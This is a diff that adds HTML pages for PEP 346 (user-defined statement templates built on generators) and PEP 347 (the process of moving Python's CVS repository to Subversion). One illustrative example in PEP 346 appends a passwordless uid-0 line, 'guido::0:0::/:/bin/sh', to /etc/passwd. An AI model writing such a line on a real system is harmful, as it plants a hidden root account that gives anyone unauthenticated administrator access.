+        # Any required arguments (e.g. a file name)
+        # get stored in member variables
+        # The various BLOCK's will need updating to reflect
+        # that.
+
+    def __enter__(self):
+        SETUP_BLOCK
+
+    def __exit__(self, exc_type, value, traceback):
+        try:
+            try:
+                if exc_type is not None:
+                    raise exc_type, value, traceback
+            except exc_type1, exc:
+                EXCEPT_BLOCK1
+            except exc_type2, exc:
+                EXCEPT_BLOCK2
+            except:
+                EXCEPT_BLOCK3
+            else:
+                ELSE_BLOCK
+        finally:
+            FINALLY_BLOCK
+
+
+

Which can then be used as:

+
with my_template(*args):
+    TRY_BLOCK
+
+
+

However, there are two important semantic differences between this +code and the original try statement.

+

Firstly, in the original try statement, if a break, return +or continue statement is encountered in TRY_BLOCK, only +FINALLY_BLOCK will be executed as the statement completes. With +the statement template, ELSE_BLOCK will also execute, as these +statements are treated like any other non-exceptional block +termination. For use cases where it matters, this is likely to be a +good thing (see transaction in the Examples), as this hole where +neither the except nor the else clause gets executed is easy +to forget when writing exception handlers.

+

Secondly, the statement template will not suppress any exceptions. +If, for example, the original code suppressed the exc_type1 and +exc_type2 exceptions, then this would still need to be done inline +in the user code:

+
try:
+    with my_template(*args):
+        TRY_BLOCK
+except (exc_type1, exc_type2):
+    pass
+
+
+

However, even in these cases where the suppression of exceptions needs +to be made explicit, the amount of boilerplate repeated at the calling +site is significantly reduced (See Rejected Options for further +discussion of this behaviour).

+

In general, not all of the clauses will be needed. For resource +handling (like files or synchronisation locks), it is possible to +simply execute the code that would have been part of FINALLY_BLOCK +in the __exit__() method. This can be seen in the following +implementation that makes synchronisation locks into statement +templates as mentioned at the beginning of this section:

+
# New methods of synchronisation lock objects
+
+def __enter__(self):
+    self.acquire()
+    return self
+
+def __exit__(self, *exc_info):
+    self.release()
+
+
+
+
+
+

Generators

+

With their ability to suspend execution, and return control to the +calling frame, generators are natural candidates for writing statement +templates. Adding user defined statements to the language does not +require the generator changes described in this section, thus making +this PEP an obvious candidate for a phased implementation (with +statements in phase 1, generator integration in phase 2). The +suggested generator updates allow arbitrary exception handling to +be factored out like this:

+
@statement_template
+def my_template(*arguments):
+    SETUP_BLOCK
+    try:
+        try:
+            yield
+        except exc_type1, exc:
+            EXCEPT_BLOCK1
+        except exc_type2, exc:
+            EXCEPT_BLOCK2
+        except:
+            EXCEPT_BLOCK3
+        else:
+            ELSE_BLOCK
+    finally:
+        FINALLY_BLOCK
+
+
+

Notice that, unlike the class based version, none of the blocks need +to be modified, as shared values are local variables of the +generator’s internal frame, including the arguments passed in by the +invoking code. The semantic differences noted earlier (all +non-exceptional block termination triggers the else clause, and +the template is unable to suppress exceptions) still apply.

+
+

Default value for yield

+

When creating a statement template with a generator, the yield +statement will often be used solely to return control to the body of +the user defined statement, rather than to return a useful value.

+

Accordingly, if this PEP is accepted, yield, like return, will +supply a default value of None (i.e. yield and yield None +will become equivalent statements).

+

This same change is being suggested in PEP 342. Obviously, it would +only need to be implemented once if both PEPs were accepted :)

+
+
+

Template generator decorator: statement_template

+

As with PEP 343, a new decorator is suggested that wraps a generator +in an object with the appropriate statement template semantics. +Unlike PEP 343, the templates suggested here are reusable, as the +generator is instantiated anew in each call to __enter__(). +Additionally, any exceptions that occur in BLOCK1 are re-raised in +the generator’s internal frame:

+
class template_generator_wrapper(object):
+
+    def __init__(self, func, func_args, func_kwds):
+         self.func = func
+         self.args = func_args
+         self.kwds = func_kwds
+         self.gen = None
+
+    def __enter__(self):
+        if self.gen is not None:
+            raise RuntimeError("Enter called without exit!")
+        self.gen = self.func(*self.args, **self.kwds)
+        try:
+            return self.gen.next()
+        except StopIteration:
+            raise RuntimeError("Generator didn't yield")
+
+    def __exit__(self, *exc_info):
+        if self.gen is None:
+            raise RuntimeError("Exit called without enter!")
+        try:
+            try:
+                if exc_info[0] is not None:
+                    self.gen._inject_exception(*exc_info)
+                else:
+                    self.gen.next()
+            except StopIteration:
+                pass
+            else:
+                raise RuntimeError("Generator didn't stop")
+        finally:
+            self.gen = None
+
+def statement_template(func):
+    def factory(*args, **kwds):
+        return template_generator_wrapper(func, args, kwds)
+    return factory
+
+
+
+
+

Template generator wrapper: __enter__() method

+

The template generator wrapper has an __enter__() method that +creates a new instance of the contained generator, and then invokes +next() once. It will raise a RuntimeError if the last +generator instance has not been cleaned up, or if the generator +terminates instead of yielding a value.

+
+
+

Template generator wrapper: __exit__() method

+

The template generator wrapper has an __exit__() method that +simply invokes next() on the generator if no exception is passed +in. If an exception is passed in, it is re-raised in the contained +generator at the point of the last yield statement.

+

In either case, the generator wrapper will raise a RuntimeError if the +internal frame does not terminate as a result of the operation. The +__exit__() method will always clean up the reference to the used +generator instance, permitting __enter__() to be called again.

+

A StopIteration raised by the body of the user defined statement +may be inadvertently suppressed inside the __exit__() method, but +this is unimportant, as the originally raised exception still +propagates correctly.

+
+
+

Injecting exceptions into generators

+

To implement the __exit__() method of the template generator +wrapper, it is necessary to inject exceptions into the internal frame +of the generator. This is new implementation level behaviour that has +no current Python equivalent.

+

The injection mechanism (referred to as _inject_exception in this +PEP) raises an exception in the generator’s frame with the specified +type, value and traceback information. This means that the exception +looks like the original if it is allowed to propagate.

+

For the purposes of this PEP, there is no need to make this capability +available outside the Python implementation code.

+
+
+

Generator finalisation

+

To support resource management in template generators, this PEP will +eliminate the restriction on yield statements inside the try +block of a try/finally statement. Accordingly, generators +which require the use of a file or some such object can ensure the +object is managed correctly through the use of try/finally or +with statements.

+

This restriction will likely need to be lifted globally - it would be +difficult to restrict it so that it was only permitted inside +generators used to define statement templates. Accordingly, this PEP +includes suggestions designed to ensure generators which are not used +as statement templates are still finalised appropriately.

+
+
+

Generator finalisation: TerminateIteration exception

+

A new exception is proposed:

+
class TerminateIteration(Exception): pass
+
+
+

The new exception is injected into a generator in order to request +finalisation. It should not be suppressed by well-behaved code.

+
+
+

Generator finalisation: __del__() method

+

To ensure a generator is finalised eventually (within the limits of +Python’s garbage collection), generators will acquire a __del__() +method with the following semantics:

+
def __del__(self):
+    try:
+        self._inject_exception(TerminateIteration, None, None)
+    except TerminateIteration:
+        pass
+
+
+
+
+

Deterministic generator finalisation

+

There is a simple way to provide deterministic finalisation of +generators - give them appropriate __enter__() and __exit__() +methods:

+
def __enter__(self):
+    return self
+
+def __exit__(self, *exc_info):
+    try:
+        self._inject_exception(TerminateIteration, None, None)
+    except TerminateIteration:
+        pass
+
+
+

Then any generator can be finalised promptly by wrapping the relevant +for loop inside a with statement:

+
with all_lines(filenames) as lines:
+    for line in lines:
+        print lines
+
+
+

(See the Examples for the definition of all_lines, and the reason +it requires prompt finalisation)

+

Compare the above example to the usage of file objects:

+
with open(filename) as f:
+    for line in f:
+        print f
+
+
+
+
+

Generators as user defined statement templates

+

When used to implement a user defined statement, a generator should +yield only once on a given control path. The result of that yield +will then be provided as the result of the generator’s __enter__() +method. Having a single yield on each control path ensures that +the internal frame will terminate when the generator’s __exit__() +method is called. Multiple yield statements on a single control +path will result in a RuntimeError being raised by the +__exit__() method when the internal frame fails to terminate +correctly. Such an error indicates a bug in the statement template.

+

To respond to exceptions, or to clean up resources, it is sufficient +to wrap the yield statement in an appropriately constructed +try statement. If execution resumes after the yield without +an exception, the generator knows that the body of the do +statement completed without incident.

+
+
+
+

Examples

+
    +
  1. A template for ensuring that a lock, acquired at the start of a +block, is released when the block is left:
    # New methods on synchronisation locks
    +    def __enter__(self):
    +        self.acquire()
    +        return self
    +
    +    def __exit__(self, *exc_info):
    +        lock.release()
    +
    +
    +

    Used as follows:

    +
    with myLock:
    +    # Code here executes with myLock held.  The lock is
    +    # guaranteed to be released when the block is left (even
    +    # if via return or by an uncaught exception).
    +
    +
    +
  2. +
  3. A template for opening a file that ensures the file is closed when +the block is left:
    # New methods on file objects
    +    def __enter__(self):
    +        if self.closed:
    +            raise RuntimeError, "Cannot reopen closed file handle"
    +        return self
    +
    +    def __exit__(self, *args):
    +        self.close()
    +
    +
    +

    Used as follows:

    +
    with open("/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  4. +
  5. A template for committing or rolling back a database transaction:
    def transaction(db):
    +    try:
    +        yield
    +    except:
    +        db.rollback()
    +    else:
    +        db.commit()
    +
    +
    +

    Used as follows:

    +
    with transaction(the_db):
    +    make_table(the_db)
    +    add_data(the_db)
    +    # Getting to here automatically triggers a commit
    +    # Any exception automatically triggers a rollback
    +
    +
    +
  6. +
  7. It is possible to nest blocks and combine templates:
    @statement_template
    +def lock_opening(lock, filename, mode="r"):
    +    with lock:
    +        with open(filename, mode) as f:
    +            yield f
    +
    +
    +

    Used as follows:

    +
    with lock_opening(myLock, "/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  8. +
  9. Redirect stdout temporarily:
    @statement_template
    +def redirected_stdout(new_stdout):
    +    save_stdout = sys.stdout
    +    try:
    +        sys.stdout = new_stdout
    +        yield
    +    finally:
    +        sys.stdout = save_stdout
    +
    +
    +

    Used as follows:

    +
    with open(filename, "w") as f:
    +    with redirected_stdout(f):
    +        print "Hello world"
    +
    +
    +
  10. +
  11. A variant on open() that also returns an error condition:
    @statement_template
    +def open_w_error(filename, mode="r"):
    +    try:
    +        f = open(filename, mode)
    +    except IOError, err:
    +        yield None, err
    +    else:
    +        try:
    +            yield f, None
    +        finally:
    +            f.close()
    +
    +
    +

    Used as follows:

    +
    do open_w_error("/etc/passwd", "a") as f, err:
    +    if err:
    +        print "IOError:", err
    +    else:
    +        f.write("guido::0:0::/:/bin/sh\n")
    +
    +
    +
  12. +
  13. Find the first file with a specific header:
    for name in filenames:
    +    with open(name) as f:
    +        if f.read(2) == 0xFEB0:
    +            break
    +
    +
    +
  14. +
  15. Find the first item you can handle, holding a lock for the entire +loop, or just for each iteration:
    with lock:
    +    for item in items:
    +        if handle(item):
    +            break
    +
    +for item in items:
    +    with lock:
    +        if handle(item):
    +            break
    +
    +
    +
  16. +
  17. Hold a lock while inside a generator, but release it when +returning control to the outer scope:
    @statement_template
    +def released(lock):
    +    lock.release()
    +    try:
    +        yield
    +    finally:
    +        lock.acquire()
    +
    +
    +

    Used as follows:

    +
    with lock:
    +    for item in items:
    +        with released(lock):
    +            yield item
    +
    +
    +
  18. +
  19. Read the lines from a collection of files (e.g. processing +multiple configuration sources):
    def all_lines(filenames):
    +    for name in filenames:
    +        with open(name) as f:
    +            for line in f:
    +                yield line
    +
    +
    +

    Used as follows:

    +
    with all_lines(filenames) as lines:
    +    for line in lines:
    +        update_config(line)
    +
    +
    +
  20. +
  21. Not all uses need to involve resource management:
    @statement_template
    +def tag(*args, **kwds):
    +    name = cgi.escape(args[0])
    +    if kwds:
    +        kwd_pairs = ["%s=%s" % cgi.escape(key), cgi.escape(value)
    +                     for key, value in kwds]
    +        print '<%s %s>' % name, " ".join(kwd_pairs)
    +    else:
    +        print '<%s>' % name
    +    yield
    +    print '</%s>' % name
    +
    +
    +

    Used as follows:

    +
    with tag('html'):
    +    with tag('head'):
    +       with tag('title'):
    +          print 'A web page'
    +    with tag('body'):
    +       for par in pars:
    +          with tag('p'):
    +             print par
    +       with tag('a', href="http://www.python.org"):
    +           print "Not a dead parrot!"
    +
    +
    +
  22. +
  23. From PEP 343, another useful example would be an operation that +blocks signals. The use could be like this:
    from signal import blocked_signals
    +
    +with blocked_signals():
    +    # code executed without worrying about signals
    +
    +
    +

    An optional argument might be a list of signals to be blocked; by +default all signals are blocked. The implementation is left as an +exercise to the reader.

    +
  24. +
  25. Another use for this feature is for Decimal contexts:
    # New methods on decimal Context objects
    +
    +def __enter__(self):
    +    if self._old_context is not None:
    +        raise RuntimeError("Already suspending other Context")
    +    self._old_context = getcontext()
    +    setcontext(self)
    +
    +def __exit__(self, *args):
    +    setcontext(self._old_context)
    +    self._old_context = None
    +
    +
    +

    Used as follows:

    +
    with decimal.Context(precision=28):
    +   # Code here executes with the given context
    +   # The context always reverts after this statement
    +
    +
    +
  26. +
+
+
+

Open Issues

+

None, as this PEP has been withdrawn.

+
+
+

Rejected Options

+
+

Having the basic construct be a looping construct

+

The major issue with this idea, as illustrated by PEP 340’s +block statements, is that it causes problems with factoring +try statements that are inside loops, and contain break and +continue statements (as these statements would then apply to the +block construct, instead of the original loop). As a key goal is +to be able to factor out arbitrary exception handling (other than +suppression) into statement templates, this is a definite problem.

+

There is also an understandability problem, as can be seen in the +Examples. In the example showing acquisition of a lock either for an +entire loop, or for each iteration of the loop, if the user defined +statement was itself a loop, moving it from outside the for loop +to inside the for loop would have major semantic implications, +beyond those one would expect.

+

Finally, with a looping construct, there are significant problems with +TOOWTDI, as it is frequently unclear whether a particular situation +should be handled with a conventional for loop or the new looping +construct. With the current PEP, there is no such problem - for +loops continue to be used for iteration, and the new do statements +are used to factor out exception handling.

+

Another issue, specifically with PEP 340’s anonymous block statements, +is that they make it quite difficult to write statement templates +directly (i.e. not using a generator). This problem is addressed by +the current proposal, as can be seen by the relative simplicity of the +various class based implementations of statement templates in the +Examples.

+
+
+

Allowing statement templates to suppress exceptions

+

Earlier versions of this PEP gave statement templates the ability to +suppress exceptions. The BDFL expressed concern over the associated +complexity, and I agreed after reading an article by Raymond Chen +about the evils of hiding flow control inside macros in C code [1].

+

Removing the suppression ability eliminated a whole lot of complexity +from both the explanation and implementation of user defined +statements, further supporting it as the correct choice. Older +versions of the PEP had to jump through some horrible hoops to avoid +inadvertently suppressing exceptions in __exit__() methods - that +issue does not exist with the current suggested semantics.

+

There was one example (auto_retry) that actually used the ability +to suppress exceptions. This use case, while not quite as elegant, +has significantly more obvious control flow when written out in full +in the user code:

+
def attempts(num_tries):
+    return reversed(xrange(num_tries))
+
+for retry in attempts(3):
+    try:
+        make_attempt()
+    except IOError:
+        if not retry:
+            raise
+
+
+

For what it’s worth, the perverse could still write this as:

+
for attempt in auto_retry(3, IOError):
+    try:
+        with attempt:
+            make_attempt()
+    except FailedAttempt:
+        pass
+
+
+

To protect the innocent, the code to actually support that is not +included here.

+
+
+

Differentiating between non-exceptional exits

+

Earlier versions of this PEP allowed statement templates to +distinguish between exiting the block normally, and exiting via a +return, break or continue statement. The BDFL flirted +with a similar idea in PEP 343 and its associated discussion. This +added significant complexity to the description of the semantics, and +it required each and every statement template to decide whether or not +those statements should be treated like exceptions, or like a normal +mechanism for exiting the block.

+

This template-by-template decision process raised great potential for +confusion - consider if one database connector provided a transaction +template that treated early exits like an exception, whereas a second +connector treated them as normal block termination.

+

Accordingly, this PEP now uses the simplest solution - early exits +appear identical to normal block termination as far as the statement +template is concerned.

+
+
+

Not injecting raised exceptions into generators

+

PEP 343 suggests simply invoking next() unconditionally on generators +used to define statement templates. This means the template +generators end up looking rather unintuitive, and the retention of the +ban against yielding inside try/finally means that Python’s +exception handling capabilities cannot be used to deal with management +of multiple resources.

+

The alternative which this PEP advocates (injecting raised exceptions +into the generator frame), means that multiple resources can be +managed elegantly as shown by lock_opening in the Examples

+
+
+

Making all generators statement templates

+

Separating the template object from the generator itself makes it +possible to have reusable generator templates. That is, the following +code will work correctly if this PEP is accepted:

+
open_it = lock_opening(parrot_lock, "dead_parrot.txt")
+
+with open_it as f:
+    # use the file for a while
+
+with open_it as f:
+    # use the file again
+
+
+

The second benefit is that iterator generators and template generators +are very different things - the decorator keeps that distinction +clear, and prevents one being used where the other is required.

+

Finally, requiring the decorator allows the native methods of +generator objects to be used to implement generator finalisation.

+
+
+

Using do as the keyword

+

do was an alternative keyword proposed during the PEP 340 +discussion. It reads well with appropriately named functions, but it +reads poorly when used with methods, or with objects that provide +native statement template support.

+

When do was first suggested, the BDFL had rejected PEP 310’s +with keyword, based on a desire to use it for a Pascal/Delphi +style with statement. Since then, the BDFL has retracted this +objection, as he no longer intends to provide such a statement. This +change of heart was apparently based on the C# developers reasons for +not providing the feature [2].

+
+
+

Not having a keyword

+

This is an interesting option, and can be made to read quite well. +However, it’s awkward to look up in the documentation for new users, +and strikes some as being too magical. Accordingly, this PEP goes +with a keyword based suggestion.

+
+
+

Enhancing try statements

+

This suggestion involves give bare try statements a signature +similar to that proposed for with statements.

+

I think that trying to write a with statement as an enhanced +try statement makes as much sense as trying to write a for +loop as an enhanced while loop. That is, while the semantics of +the former can be explained as a particular way of using the latter, +the former is not an instance of the latter. The additional +semantics added around the more fundamental statement result in a new +construct, and the two different statements shouldn’t be confused.

+

This can be seen by the fact that the ‘enhanced’ try statement +still needs to be explained in terms of a ‘non-enhanced’ try +statement. If it’s something different, it makes more sense to give +it a different name.

+
+
+

Having the template protocol directly reflect try statements

+

One suggestion was to have separate methods in the protocol to cover +different parts of the structure of a generalised try statement. +Using the terms try, except, else and finally, we +would have something like:

+
class my_template(object):
+
+    def __init__(self, *args):
+        # Any required arguments (e.g. a file name)
+        # get stored in member variables
+        # The various BLOCK's will need to updated to reflect
+        # that.
+
+    def __try__(self):
+        SETUP_BLOCK
+
+    def __except__(self, exc, value, traceback):
+        if isinstance(exc, exc_type1):
+            EXCEPT_BLOCK1
+        if isinstance(exc, exc_type2):
+            EXCEPT_BLOCK2
+        else:
+            EXCEPT_BLOCK3
+
+    def __else__(self):
+        ELSE_BLOCK
+
+    def __finally__(self):
+        FINALLY_BLOCK
+
+
+

Aside from preferring the addition of two method slots rather than +four, I consider it significantly easier to be able to simply +reproduce a slightly modified version of the original try +statement code in the __exit__() method (as shown in Factoring +out arbitrary exception handling), rather than have to split the +functionality amongst several different methods (or figure out +which method to use if not all clauses are used by the template).

+

To make this discussion less theoretical, here is the transaction +example implemented using both the two method and the four method +protocols instead of a generator. Both implementations guarantee a +commit if a break, return or continue statement is +encountered (as does the generator-based implementation in the +Examples section):

+
class transaction_2method(object):
+
+    def __init__(self, db):
+        self.db = db
+
+    def __enter__(self):
+        pass
+
+    def __exit__(self, exc_type, *exc_details):
+        if exc_type is None:
+            self.db.commit()
+        else:
+            self.db.rollback()
+
+class transaction_4method(object):
+
+    def __init__(self, db):
+        self.db = db
+        self.commit = False
+
+    def __try__(self):
+        self.commit = True
+
+    def __except__(self, exc_type, exc_value, traceback):
+        self.db.rollback()
+        self.commit = False
+
+    def __else__(self):
+        pass
+
+    def __finally__(self):
+        if self.commit:
+            self.db.commit()
+            self.commit = False
+
+
+

There are two more minor points, relating to the specific method names +in the suggestion. The name of the __try__() method is +misleading, as SETUP_BLOCK executes before the try statement +is entered, and the name of the __else__() method is unclear in +isolation, as numerous other Python statements include an else +clause.

+
+
+
+

Iterator finalisation (WITHDRAWN)

+

The ability to use user defined statements inside generators is likely +to increase the need for deterministic finalisation of iterators, as +resource management is pushed inside the generators, rather than being +handled externally as is currently the case.

+

The PEP currently suggests handling this by making all generators +statement templates, and using with statements to handle +finalisation. However, earlier versions of this PEP suggested the +following, more complex, solution, that allowed the author of a +generator to flag the need for finalisation, and have for loops +deal with it automatically. It is included here as a long, detailed +rejected option.

+
+

Iterator protocol addition: __finish__

+

An optional new method for iterators is proposed, called +__finish__(). It takes no arguments, and should not return +anything.

+

The __finish__ method is expected to clean up all resources the +iterator has open. Iterators with a __finish__() method are +called ‘finishable iterators’ for the remainder of the PEP.

+
+
+

Best effort finalisation

+

A finishable iterator should ensure that it provides a __del__ +method that also performs finalisation (e.g. by invoking the +__finish__() method). This allows Python to still make a best +effort at finalisation in the event that deterministic finalisation is +not applied to the iterator.

+
+
+

Deterministic finalisation

+

If the iterator used in a for loop has a __finish__() method, +the enhanced for loop semantics will guarantee that that method +will be executed, regardless of the means of exiting the loop. This +is important for iterator generators that utilise user defined +statements or the now permitted try/finally statements, or +for new iterators that rely on timely finalisation to release +allocated resources (e.g. releasing a thread or database connection +back into a pool).

+
+
+

for loop syntax

+

No changes are suggested to for loop syntax. This is just to +define the statement parts needed for the description of the +semantics:

+
for VAR1 in EXPR1:
+    BLOCK1
+else:
+    BLOCK2
+
+
+
+
+

Updated for loop semantics

+

When the target iterator does not have a __finish__() method, a +for loop will execute as follows (i.e. no change from the status +quo):

+
itr = iter(EXPR1)
+exhausted = False
+while True:
+    try:
+        VAR1 = itr.next()
+    except StopIteration:
+        exhausted = True
+        break
+    BLOCK1
+if exhausted:
+    BLOCK2
+
+
+

When the target iterator has a __finish__() method, a for loop +will execute as follows:

+
itr = iter(EXPR1)
+exhausted = False
+try:
+    while True:
+        try:
+            VAR1 = itr.next()
+        except StopIteration:
+            exhausted = True
+            break
+        BLOCK1
+    if exhausted:
+        BLOCK2
+finally:
+    itr.__finish__()
+
+
+

The implementation will need to take some care to avoid incurring the +try/finally overhead when the iterator does not have a +__finish__() method.

+
+
+

Generator iterator finalisation: __finish__() method

+

When enabled with the appropriate decorator, generators will have a +__finish__() method that raises TerminateIteration in the +internal frame:

+
def __finish__(self):
+    try:
+        self._inject_exception(TerminateIteration)
+    except TerminateIteration:
+        pass
+
+
+

A decorator (e.g. needs_finish()) is required to enable this +feature, so that existing generators (which are not expecting +finalisation) continue to work as expected.

+
+
+

Partial iteration of finishable iterators

+

Partial iteration of a finishable iterator is possible, although it +requires some care to ensure the iterator is still finalised promptly +(it was made finishable for a reason!). First, we need a class to +enable partial iteration of a finishable iterator by hiding the +iterator’s __finish__() method from the for loop:

+
class partial_iter(object):
+
+    def __init__(self, iterable):
+        self.iter = iter(iterable)
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        return self.itr.next()
+
+
+

Secondly, an appropriate statement template is needed to ensure the +iterator is finished eventually:

+
@statement_template
+def finishing(iterable):
+      itr = iter(iterable)
+      itr_finish = getattr(itr, "__finish__", None)
+      if itr_finish is None:
+          yield itr
+      else:
+          try:
+              yield partial_iter(itr)
+          finally:
+              itr_finish()
+
+
+

This can then be used as follows:

+
do finishing(finishable_itr) as itr:
+    for header_item in itr:
+        if end_of_header(header_item):
+            break
+        # process header item
+    for body_item in itr:
+        # process body item
+
+
+

Note that none of the above is needed for an iterator that is not +finishable - without a __finish__() method, it will not be +promptly finalised by the for loop, and hence inherently allows +partial iteration. Allowing partial iteration of non-finishable +iterators as the default behaviour is a key element in keeping this +addition to the iterator protocol backwards compatible.

+
+
+
+

Acknowledgements

+

The acknowledgements section for PEP 340 applies, since this text grew +out of the discussion of that PEP, but additional thanks go to Michael +Hudson, Paul Moore and Guido van Rossum for writing PEP 310 and PEP +340 in the first place, and to (in no meaningful order) Fredrik Lundh, +Phillip J. Eby, Steven Bethard, Josiah Carlson, Greg Ewing, Tim +Delaney and Arnold deVos for prompting particular ideas that made +their way into this text.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0346.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0347/index.html b/pep-0347/index.html new file mode 100644 index 00000000000..f13c7db42da --- /dev/null +++ b/pep-0347/index.html @@ -0,0 +1,408 @@ + + + + + + + + PEP 347 – Migrating the Python CVS to Subversion | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 347 – Migrating the Python CVS to Subversion

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
14-Jul-2004
+
Post-History:
+
14-Jul-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Python source code is currently managed in a CVS repository on +sourceforge.net. This PEP proposes to move it to a Subversion +repository on svn.python.org.

+
+
+

Rationale

+

This change has two aspects: moving from CVS to Subversion, and moving +from SourceForge to python.org. For each, a rationale will be given.

+
+

Moving to Subversion

+

CVS has a number of limitations that have been eliminated by +Subversion. For the development of Python, the most notable +improvements are:

+
    +
  • the ability to rename files and directories, and to remove +directories, while keeping the history of these files.
  • +
  • support for change sets (sets of correlated changes to multiple +files) through global revision numbers. Change sets are +transactional.
  • +
  • atomic, fast tagging: a cvs tag might take many minutes; a +Subversion tag (svn cp) will complete quickly, and atomically. +Likewise, branches are very efficient.
  • +
  • support for offline diffs, which is useful when creating patches.
  • +
+
+
+

Moving to python.org

+

SourceForge has kindly provided an important infrastructure for the +past years. Unfortunately, the attention that SF received has also +caused repeated overload situations in the past, to which the SF +operators could not always respond in a timely manner. In particular, +for CVS, they had to reduce the load on the primary CVS server by +introducing a second, read-only CVS server for anonymous access. This +server is regularly synchronized, but lags behind the read-write CVS +repository between synchronizations. As a result, users without +commit access can see recent changes to the repository only after a +delay.

+

On python.org, it would be possible to make the repository accessible +for anonymous access.

+
+
+
+

Migration Procedure

+

To move the Python CVS repository, the following steps need to be +executed. The steps are elaborated upon in the following sections.

+
    +
  1. Collect SSH keys for all current committers, along with usernames +to appear in commit messages.
  2. +
  3. At the beginning of the migration, announce that the repository on +SourceForge closed.
  4. +
  5. 24 hours after the last commit, download the CVS repository.
  6. +
  7. Convert the CVS repository into a Subversion repository.
  8. +
  9. Publish the repository with write access for committers, and +read-only anonymous access.
  10. +
  11. Disable CVS access on SF.
  12. +
+
+

Collect SSH keys

+

After some discussion, svn+ssh was selected as the best method +for write access to the repository. Developers can continue to +use their SSH keys, but they must be installed on python.org.

+

In order to avoid having to create a new Unix user for each +developer, a single account should be used, with command= +attributes in the authorized_keys files.

+

The lines in the authorized_keys file should read like this +(wrapped for better readability):

+
command="/usr/bin/svnserve --root=/svnroot -t
+--tunnel-user='<username>'",no-port-forwarding,
+no-X11-forwarding,no-agent-forwarding,no-pty
+ssh-dss <key> <comment>
+
+
+

As the usernames, the real names should be used instead of +the SF account names, so that people can be better identified +in log messages.

+
+
+

Administrator Access

+

Administrator access to the pythondev account should be granted +to all current admins of the Python SF project. To distinguish +between shell login and svnserve login, admins need to maintain +two keys. Using OpenSSH, the following procedure can be +used to create a second key:

+
cd .ssh
+ssh-keygen -t DSA -f pythondev -C <user>@pythondev
+vi config
+
+
+

In the config file, the following lines need to be added:

+
Host pythondev
+  Hostname dinsdale.python.org
+  User pythondev
+  IdentityFile ~/.ssh/pythondev
+
+
+

Then, shell login becomes possible through “ssh pythondev”.

+
+
+

Downloading the CVS Repository

+

The CVS repository can be downloaded from

+
+
+

Since this tarball is generated only once a day, some time must pass +after the repository freeze before the tarball can be picked up. It +should be verified that the last commit, as recorded on the +python-commits mailing list, is indeed included in the tarball.

+

After the conversion, the converted CVS tarball should be kept +forever on www.python.org/archive/python-cvsroot-<date>.tar.bz2

+
+
+

Converting the CVS Repository

+

The Python CVS repository contains two modules: distutils and python. +The python module is further structured into dist and nondist, +where dist only contains src (the python code proper). nondist +contains various subdirectories.

+

These should be reorganized in the Subversion repository to get +shorter URLs, following the <project>/{trunk,tags,branches} +structure. A project will be created for each nondist directory, +plus for src (called python), plus distutils. Reorganizing the +repository is best done in the CVS tree, as shown below.

+

The fsfs backend should be used as the repository format (which +requires Subversion 1.1). The fsfs backend has the advantage of being +more backup-friendly, as it allows incremental repository backups, +without requiring any dump commands to be run.

+

The conversion should be done using the cvs2svn utility, available +e.g. in the cvs2svn Debian package. As cvs2svn does not currently +support the project/trunk structure, each project needs to be +converted separately. To get each conversion result into a separate +directory in the target repository, svnadmin load must be used.

+

Subversion has a different view on binary-vs-text files than CVS. +To correctly carry the CVS semantics forward, svn:eol-style should +be set to native on all files that are not marked binary in the +CVS.

+

In summary, the conversion script is:

+
#!/bin/sh
+rm cvs2svn-*
+rm -rf python py.new
+tar xjf python-cvsroot.tar.bz2
+rm -rf python/CVSROOT
+svnadmin create --fs-type fsfs py.new
+mv python/python python/orig
+mv python/orig/dist/src python/python
+mv python/orig/nondist/* python
+# nondist/nondist is empty
+rmdir python/nondist
+rm -rf python/orig
+for a in python/*
+do
+  b=`basename $a`
+  cvs2svn -q --dump-only --encoding=latin1 --force-branch=cnri-16-start \
+  --force-branch=descr-branch --force-branch=release152p1-patches \
+  --force-tag=r16b1 $a
+  svn mkdir -m"Conversion to SVN" file:///`pwd`/py.new/$b
+  svnadmin load -q --parent-dir $b py.new < cvs2svn-dump
+  rm cvs2svn-dump
+done
+
+
+

Sample results of this conversion are available at

+
+
+
+
+

Publish the Repository

+

The repository should be published at http://svn.python.org/projects. +Read-write access should be granted to all current SF committers +through svn+ssh://pythondev@svn.python.org/; +read-only anonymous access through WebDAV should also be +granted.

+

As an option, websvn (available e.g. from the Debian websvn package) +could be provided. Unfortunately, in the test installation, websvn +breaks because it runs out of memory.

+

The current SF project admins should get write access to the +authorized_keys2 file of the pythondev account.

+
+
+

Disable CVS

+

It appears that CVS cannot be disabled entirely. Only the user +interface can be removed from the project page; the repository itself +remains available. If desired, write access to the python and +distutils modules can be disabled through a CVS commitinfo entry.

+
+
+
+

Discussion

+

Several alternatives had been suggested to the procedure above. +The rejected alternatives are shortly discussed here:

+
    +
  • create multiple repositories, one for python and one for +distutils. This would have allowed even shorter URLs, but +was rejected because a single repository supports moving code +across projects.
  • +
  • Several people suggested to create the project/trunk structure +through standard cvs2svn, followed by renames. This would have +the disadvantage that old revisions use different path names +than recent revisions; the suggested approach through dump files +works without renames.
  • +
  • Several people also expressed concern about the administrative +overhead that hosting the repository on python.org would cause +to pydotorg admins. As a specific alternative, BerliOS has been +suggested. The pydotorg admins themselves haven't objected +to the additional workload; migrating the repository again if +they get overworked is an option.
  • +
  • Different authentication strategies were discussed. As +alternatives to svn+ssh were suggested
      +
    • Subversion over WebDAV, using SSL and basic authentication, +with pydotorg-generated passwords mailed to the user. People +did not like that approach, since they would need to store +the password on disk (because they can’t remember it); this +is a security risk.
    • +
    • Subversion over WebDAV, using SSL client certificates. This would +work, but would require us to administer a certificate authority.
    • +
    +
  • +
  • Instead of hosting this on python.org, people suggested hosting +it elsewhere. One issue is whether this alternative should be +free or commercial; several people suggested it should better +be commercial, to reduce the load on the volunteers. In +particular:
      +
